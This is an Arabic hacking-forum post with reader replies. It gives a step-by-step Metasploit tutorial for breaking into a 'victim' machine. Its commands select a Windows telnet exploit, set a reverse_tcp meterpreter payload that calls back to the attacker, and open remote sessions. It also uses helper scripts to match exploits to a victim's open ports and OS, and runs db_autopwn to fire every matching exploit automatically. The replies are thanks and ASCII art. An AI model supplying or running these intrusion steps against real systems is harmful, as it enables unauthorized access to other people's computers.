السلآم عليـكم و رحمة اللهـ و بركـآتـة اول شـرح لـي بالمنظمـة ، اتمنى ان يفيـد الجميـع , اخذت لـي لفهـ سريـعهـ بالقسـم و بصرآحـهـ المواضيـع اغلبها متقـآربه مـن بعـض و مشروحهـ بأكثـر من منتـدى ،، فأن شـآء الله راح اشرح لـو 50% عـن الميتـى سبلويت و ادواتهـ التـي يحتـآجهـآ الهـآكر و لو تلاحضون اني كتبت في الموضوع المستخدم العربي مـآ حبيـت اقول كراكر عربي ، لكـن الهكـر هو مـن لآ يجعـل آمــآمه شـي الا و يبحـث عن كـل مـآ يخصـه و يتقنهـ و المستخـدم العربـي مـآ يعرف بالميتـآ الا db_nmap , msfconsole , payload و ثغرات السمب المنقرضه و هذآ بصراحهـ شـي مخزي ، للعـلم ان مشروع الميتـآسبلويت من اقوى اول 10 مشاريع للهـآكرز ، و هو منتشر بكل المنتديـآت العربيـهـ بس للاسف القليل الي يهتـم لجميـع ادواتهـ فآنا ببدأ بشرح بعض الادوات و البـآقي عليكـم ،، اول ادآة و هـي msfconsole معروف ان الاداه هي الميتـآسبلويت و استغلال القغرات يكون عن طريقهـآ غـالباً قبل كـل شـي الشـرح بيكون على توزيعة backtrack4 fainl نبدأ بشرح اول اداه و هي msfconsie معروفهـ الاداه بشرحها كي يكمل الموضوع نذهب الى مسار الميتاسبلويت بالامر هذا cd /pentest/exploits/framework3 ثم اكتب الامر هذا لتشغيل اداة الـmsfconsle ./msfconsole و تستطيع ان تدخل للأداه دون الذهاب للمسار بمجرد كتابت msfconsle بالترنمال الاداه فيها الادوات التـآليـهـ : exploits < الثغرات الي تسمح لنا بدخول نظام الضحيه payload < البايلود الملف الي بيتصل بجهاز الضحيه و لن تستطيع تطبيق اي ثغره الا بأستخدام الاداه auxiliary < فيها ادوات كثيره مثل الـفحـص و غيره لن اتطرق لها بالموضوع هذآ encoders < تستعمل للتشفير و لن اتطرق لها بهذا الموضوع ايضاً و هناك بعض الادوات ان شاء الله نشرحها مع الوقت بشرح الأداتين expliot and payload الي هي الاهم في الاختراق نبدأ بشرح الاداة exploit الاداه سهـلهـ جداً و ثغرآتهـآ لآ تحتاج الا للـip فقـط [غالباً] بعـض الثغرآت يختلف طريقة استغلآلهـآ و تأكد ان كل ثغره موجوده او كل exploit يحتاج الى بايلود لعرض الثغرات نطبق الامر هذا كود PHP: show exploits و لاستغلال ثغره معينهـ نطبق الامر كود PHP: use exploit/النظام المصاب / نوع الثغره / اسم الثغره / يعني لو بغيت تستغل مثلاً ثغرة التلنت تطبق الامر التالي كود PHP: use exploit/windows/telnet/gamsoft_telsrv_username نشوف اول شي كتبنا اكسبلويت ثم الونيدوز الي هو النظام المصاب و التلنت نوع الثغره ثم اسمها و التلنت له ثغرتين بالميتا الحين نطلع المتغيرات المطلوبه المتغيرات : هي الي تطلبها الثغره مثل اي بي الضحيه و البورت و تعرض المتغيرات بالامر هذا كود PHP: show options RHOST و هذي تعني اي بي الضحيه او الهوست RPORT و هذي تعني بورت الضحيه و الافضل انك تخليه مثل ماهو لان البرنامج المصاب عند الضحيه يكون متصل على البورت نفسه طيب نظيف اي بي الضحيه الى الثغره بالامر كود PHP: set RHOST 127.0.0.1 طيب نشوف اذا طبقنا الثغره الحين طلعنا المتغيرات و اضفناها بالامر الي فوق ، و بصوره انا ما اضفته للحين طيب الحين باقي نظيف البايلود الي نبي نستخدمه للضحيه و البايلودات كثير و انا افظل البايلود meterpreter لاضافة البايلود بأتصال عكسي طبق الامر هذا [و الاتصال العكسي هو الافضل دائماً و يشترط تفتح بورت 4444] كود PHP: set PAYLOAD windows/meterpreter/reverse_tcp و اذا تبي يكون الاتصال من الضحيه نفسه اكتب الامر هذا كود PHP: set PAYLOAD windows/meterpreter/bind_tcp و البايلود هذا ما راح يطلب منك الاي بي تبعك ولا البورت بس الاول بيطلب منك الاي بي تبعك و البورت 4444 و هو موجود من اول طيب نظيف الاي بي تبعنا الي بيكون اسمه LHOST بالامر كود PHP: set LHOST 127.0.0.1 طيب الحين نسوي استعراض لمتغيرات الثغره و نشوف كيف صارت و بعض الثغرات ما تقدر تسوي الاستغلال على النظام اوتماتيك فيطلب منك نظام الضحيه فعليك انك تختار النظام و قبل ان تختاره تستعرض الانظمه الي مصابه بالثغره [و احياناً يكون اصدار برنامج و ليس نظام ] طيب نكتب الامر كود PHP: show targets لعرض الانظمة المصابه وتجي الانظمة مرقمه كل نظام له رقم كود PHP: set TARGET 7 و اخيراً نكتب الامر كود PHP: exploit ليتم استغلال الثغره ، و اذا تم استغلال الثغره بيعلمك ان فيه جلسه جديده و عشان تتاكد اكتب الامر التالي كود PHP: sessions ان طلع لك كود: Active sessions No active sessions. معناه ما استغلت الثغره و السبب هو ان النظام مرقع الثغره او غيره من الاسباب و ان تم الاتصال بيطلع لك رقم للجهاز فعشان تستغله تكتب الامر كود PHP: sessions -i 1 فرقم 1 هو يعني رقم الجهاز فممكن تخترق انت اكثر من جهاز و تكون الاجهزه مرقمه طيب اوامر الـ meterpreter كثيره عشان تتحكم بجهاز الضحيه يمكنك ان تكتب help و تطلع لك الاوامر و جنب كل امر شرح له او تبحث عنها بقوقل الحيـن اتوقع ما عاد احتاج اشرح البايلود لانه صار مفهوم ننتقل من جو الاختراق الى البرامج المساعده في الميتى سبلويت الي ما شفت احد يشرحهاب المنتديات و هي مهمه لكـل مبتدئ بأختراق الانظمه ، تفيده كثير بمعرفة ثغرات الانظمه و تسهل عنه جهد كبير و الادوات هذي موجوده بالملف tools و نروح له بالامر التالي كود PHP: cd /pentest/exploits/framework3/tools/ و نكتب الامر التالي كي نعرض الملفات الموجوده بالملف كود PHP: ls طيب راح اشرح بعض الملفات المهمه نبدأ باول اداة و هي module_ports.rb الاداة هذي تعلمنا بالثغرات الي يكون فيها البورت مثلاً ثغرت السمب بورتها 445 ، نقول فحصنا الضحيه و لقينا عنده البورت 21 ولا نعرف وش له هالبورت وش ثغرته عشان نعرف نستخدم الاداه module_ports.rb طيب طريقة استخدام الاداه بالامر هذا كود PHP: ruby module_ports.rb | grep "21" و بدل الرقم 21 تضع البورت المفتوح عند الضحيـه ، و ثمها تجد الثغرات الي فيها البورت ،، ،، الاداة الثانيه و هي module_targets.rb لمعرفة ثغرات النظام فمثلاً نظام الضحيهـ هو XP SP2 اكس بي سيرفس باك 2 عشان نعرف ثغرات النظام هذا نطبق الامر التالي كود PHP: ruby module_targets.rb | grep "XP SP2" و بتطلع لنا ثغرات النظام ، او اهمها و اخطرها المطلوب هو انكم تعرفوا كيف تستعملو الادوات و جربوا جميع الادوات طيـب نرجع للمسفكونسل msfconsle لكن بطريقهـ غيـر و هي استعمال اداة db_autopwn و سبق و شرحتها بمنتدى امان العرب و هذي الاداه تسمح لنا باختراق النظام بدون تعب و تجرب عليه جميع ثغرات المنافذ المفتوحه بجهاز الضحيه لكن بشرحها هنا و الاداه هذي فيها مشكله واجهة الشعب كله و قالو حلها تعيد تركيبها و هذا مشوار لكن انا بستعملها بطريقه تختلف لحل المشكله نبدأ بالشرح اول شـيء نروح للمسفكونسل msfconsle و مشروحه فوق كيف تروح لـه طيب بعد ما نشغل msfconsle نكتب الامر هذا كود PHP: db_driver sqlite3 و الحين نطبق الامر التالي كي نفتح مجلد يكون محفوظ فيه ips الضحايا لنك تقدر تطبق الاداه هذي على اكثر من جهاز او على نطاق معين كود PHP: db_create arhaby arhaby تعني اسم المجلد طيب الحين نفحص نظام الضحيه بالامر كود PHP: db_nmap 127.0.0.1 حلو الحين باقي اخر خطوه كيف يتم استغلال الثغرات المفتوحه بجهاز الضحيهـ بالامر كود PHP: db_autopwn -x -p -e و بتشوف ان الاداه بتطبق ثغرات كثيره و بياخذ وقت على حسب البورتات المفتوحه بجهاز الضحيه و عدد الاجهزه الي بتطبق عليها و هذا شرح من اليوتييوب http://www.youtube.com/watch?v=QfloV0FbwG8 عسى اني افدتكم بأول شرح لـي ، و الاهدأء الى نجوم المنتدى Cracker black.jaguar ASDELY-ScOrPiOn
مشكور يا غالي تقبل مروري المتواضع تحياتي لك...
يعطيك العافيه عزيزي موضوع متميز
..............8...8 8888888...8......... ......... ............8888.888 88888.8888.......... .... ...........88888.888 8888.888888......... ... ...........888888888 8888888888.......... .. ..............888888 8888888888.......... .... ..................88 888888888........... ........ .................... ..888888............ ............ .................... ....##.............. ..8................. . .................... ....##.............. 8888................ .... .................... ...##........8...888 8888...8............ . .......#............ .##......8888.888888 88.8888........ ......###.........## ......88888.8888888. 888888...... .....#####.....##... ....8888888888888888 888...... ....######...##..... ......88888888888888 8.......... ......######.##..... ..........8888888888 ............... .........####.##.... ...#...........88888 .................... ...........#####.... ..###..........##... .................... . ..............###... #####.........##.... .......#............ ................##.# ####..........##.... .....####......... ...............##.## ##.....#.....##..... .#######....... ..............##.### ......###..##....### #####....... ..............####.. .....####.##..###### ##.......... .............##..... .....#####.#..###### ....... ........ .............##..... ......#######....... ............... .............##..... ..........###...... شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
بارك الله فيك على هالشرح المميز
< No One Stays At The Top 4Ever ========== MR.kotch ==========
مشكور بارك الله فيك يعطيك العافيه عزيزي موضوع متميز تحياتي
ثاااااااااااااااااااااااا ااااااااااانكس
قوانين المنتدى
